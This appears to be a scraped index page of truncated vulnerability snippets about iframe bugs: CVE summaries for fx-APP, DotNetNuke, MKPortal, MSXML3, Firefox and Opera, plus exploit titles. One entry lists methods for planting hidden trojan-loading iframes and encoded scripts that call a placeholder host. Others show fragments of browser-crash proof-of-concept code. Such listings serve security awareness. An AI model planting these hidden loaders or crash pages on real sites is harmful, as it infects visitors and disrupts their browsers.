CVE-2006-7022

The Tools module in fx-APP 0.0.8.1 allows remote attackers to misrepresent the contents of a web page via an arbitrary URL in the url parameter to a showhtml action for index.php, which causes the URL to be displayed within an iframe...

CVE-2006-7022

The Tools module in fx-APP 0.0.8.1 allows remote attackers to misrepresent the contents of a web page via an arbitrary URL in the url parameter to a showhtml action for index.php, which causes the URL to be displayed within an iframe...

CVE-2006-7022

The CVE-2006-7022 entry concerns fx-APP 0.0.8.1, where the Tools module allows remote attackers to misrepresent a web page’s contents by supplying an arbitrary URL in the url parameter to the showhtml action of index.php, causing that URL to render inside an iframe. The available description expl...

Cross site scripting

Cross-site scripting XSS vulnerability in the IFrame module before 03.02.01 for DotNetNuke DNN allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "Pass through values."...

CVE-2007-0660

Cross-site scripting XSS vulnerability in the IFrame module before 03.02.01 for DotNetNuke DNN allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "Pass through values."...

CVE-2007-0660

The CVE-2007-0660 issue affects the DotNetNuke (DNN) IFrame module prior to version 03.02.01. The vulnerability stems from improper validation of user-supplied input in the pass-through values, leaving them unfiltered and susceptible to XSS. A remote attacker can exploit this by using crafted URL...

CVE-2007-0192

Cross-site request forgery CSRF vulnerability in the savemain operation in the adperms section in admin.php in MKPortal allows remote attackers to modify privilege settings, as demonstrated using a getURL of admin.php within a .swf file contained in an IFRAME element, aka the "All Guests are Admi...

CVE-2007-0192

The CVE-2007-0192 CSRF vulnerability affects MKPortal’s admin.php in the save_main operation (ad_perms) where an attacker can induce privilege changes. The issue is exposed via a crafted getURL in a .swf loaded in an IFRAME, enabling remote modification of privilege settings (All Guests are Admin...

phpBB 2.0.21 - privmsg.php HTML Injection

phpBB 2.0.21 - privmsg.php HTML Injection source: https://www.securityfocus.com/bid/22001/info phpBB is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HTML and scri...

phpBB (privmsg.php) XSS Exploit

phpBB privmsg.php XSS Exploit By: Demential Web: http://headburn.altervista.org E-mail: [email protected] PhpBB website: http://phpbb.com Exploit tested on phpBB 2.0.21 Secunia.com said: Input passed to the form field "Message body" in privmsg.php is not properly sanitised before it is returned to...

CVE-2007-0099

Race condition in the msxml3 module in Microsoft XML Core Services 3.0, as used in Internet Explorer 6 and other applications, allows remote attackers to execute arbitrary code or cause a denial of service application crash via many nested tags in an XML document in an IFRAME, when synchronous...

CVE-2007-0099

CVE-2007-0099 describes a race-condition in Microsoft XML Core Services 3.0 (MSXML3) used by Internet Explorer 6 and other apps. The flaw can be triggered by many nested XML tags in an IFRAME when synchronous rendering is disrupted by asynchronous events (e.g., JavaScript timers), leading to NULL...

ffoxdie.txt

= 9 setTimeout'foo',3000; else if counter = 6 setTimeout'foo',200; else setTimeout'foo',1000; counter++; else document.getElementById'foo'.src = "http://lcamtuf.coredump.cx/ffoxdieok.html"; // -- Tyger, Tyger. burning bright In the forests of the night, What immortal hand or eye Could frame thy...

Beware of being black with caution eWebEditor online editor-vulnerability warning-the black bar safety net

Network popular the website is news, forums, e-Mall as well as the blog. These systems will be required to have set the text size, color and insert images and other functions, so on the network there is a corresponding third-party functional components to complete the corresponding function, such...

security flaw

Mozilla Firefox and Thunderbird before 1.5.0.4 allow remote attackers to cause a denial of service crash and possibly execute arbitrary code via 1 nested tags in a select tag, 2 a DOMNodeRemoved mutation event, 3 "Content-implemented tree views," 4 BoxObjects, 5 the XBL implementation, 6 an ifram...

security flaw

Mozilla Firefox and Thunderbird before 1.5.0.4 allow remote attackers to cause a denial of service crash and possibly execute arbitrary code via 1 nested tags in a select tag, 2 a DOMNodeRemoved mutation event, 3 "Content-implemented tree views," 4 BoxObjects, 5 the XBL implementation, 6 an ifram...

Hung it to 4 effective method(summary)-vulnerability warning-the black bar safety net

One, the most simple are also the most effective | iframe src=http://www.xxx.com/muma.html width=0 height=0/iframe --- Second, js hang horse script src=http://www. xxx. com/muma. js/script --- Third, the js modification encryption SCRIPT language="JScript. Encode" src=http://www. xxx. com/muma...

CVE-2006-3353

Opera 9 allows remote attackers to cause a denial of service crash via a crafted web page that triggers an out-of-bounds memory access, related to an iframe and JavaScript that accesses certain style sheets properties...

CVE-2006-3353

Opera 9 is affected by CVE-2006-3353. A crafted web page can cause a denial of service (crash) through an out-of-bounds memory access, triggered by an iframe and JavaScript accessing certain styleSheets properties. The description consistently attributes this to Opera 9 and cites a DoS impact; no...

Opera Web Browser 9.00 - 'iframe' Remote Denial of Service

function mystyle if fake.document.styleSheets.length == 1 f = document.forms"basicstyle".elements; for j = 0; j milw0rm.com 2006-07-01...